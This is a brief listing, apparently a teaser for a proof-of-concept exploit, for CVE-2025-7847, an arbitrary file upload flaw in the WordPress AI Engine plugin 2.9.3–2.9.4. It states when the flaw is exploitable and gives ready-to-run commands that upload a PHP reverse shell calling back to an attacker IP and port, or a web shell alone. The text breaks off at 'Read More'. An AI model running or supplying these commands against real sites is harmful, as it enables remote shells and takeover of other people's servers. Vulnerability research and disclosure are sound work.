CVE-2025-7847 WordPress Plugin Authenticated Subscriber Arbitrary File Upload POC WordPress Plugin AI Engine 2.9.3 – 2.9.4 Proof Of Concept Please note that this vulnerability can only be exploited if the “Public API” option is enabled, which is disabled by default, and no Bearer Token is configured, nor is custom authentication added and used to protect the API. Automate Version python3 exploit-auto.py –url "https://target.com" –username "Admin" –password "L87*********C4u" –file reverse.php –attacker-ip 127.0.0.1 –attacker-port 4444 Web Shell Upload Only python3 exploit.py –url "https://target.com/" –username "Admin" –password "L87*********C4u" –file…Read More